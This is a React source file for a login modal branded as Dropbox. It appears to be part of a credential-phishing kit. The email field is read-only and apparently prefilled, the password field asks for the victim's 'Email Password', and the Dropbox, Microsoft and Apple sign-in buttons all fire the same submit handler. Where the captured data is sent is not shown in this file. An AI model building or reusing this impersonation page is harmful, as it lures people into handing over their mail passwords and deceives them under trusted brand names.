import React from 'react';

const LoginModal = ({
  isActive,
  onClose,
  email,
  setEmail,
  password,
  setPassword,
  emailError,
  passwordError,
  emailInvalid,
  passwordInvalid,
  onSubmit
}) => {
  if (!isActive) return null;

  return (
    <div className="modal active" onClick={onClose}>
      <div className="modal-content" onClick={e => e.stopPropagation()}>
        <span className="close-modal" onClick={onClose}>&times;</span>
        <img 
          src="/img/drop.png" 
          alt="Dropbox" 
          style={{ display: 'inline', width: '35%', height: 'auto', verticalAlign: 'middle' }} 
        />
        <p style={{ 
          display: 'block', 
          marginBlockStart: '1em', 
          marginBlockEnd: '1em', 
          marginInlineStart: '0px', 
          marginInlineEnd: '0px', 
          unicodeBidi: 'isolate', 
          fontSize: '18px' 
        }}>
          Sign in to continue
        </p>
        <input 
          type="email" 
          placeholder="Email Address" 
          value={email}
          onChange={(e) => setEmail(e.target.value)}
          className={emailInvalid ? 'invalid' : ''}
          readOnly
        />
        <div id="email-error" style={{ color: 'red', fontSize: '14px', marginBottom: '8px' }}>{emailError}</div>
        <input 
          type="password" 
          placeholder="Email Password" 
          value={password}
          onChange={(e) => setPassword(e.target.value)}
          className={passwordInvalid ? 'invalid' : ''}
        />
        <div id="password-error" style={{ color: 'red', fontSize: '14px', marginBottom: '8px' }}>{passwordError}</div>
        <div className="remember-me">
          <input type="checkbox" id="remember" />
          <label htmlFor="remember">Remember me</label>
        </div>

        <button className="sign-in" onClick={onSubmit}>Sign in</button>
        <button className="microsoft-btn" onClick={onSubmit}>
          <img src="https://img.icons8.com/color/48/000000/microsoft.png" alt="Microsoft" />
          Sign in with Microsoft
        </button>
        <button className="apple-btn" onClick={onSubmit}>
          <img src="https://img.icons8.com/ios-filled/50/000000/mac-os.png" alt="Apple" />
          Sign in with Apple
        </button>
      </div>
    </div>
  );
};

export default LoginModal;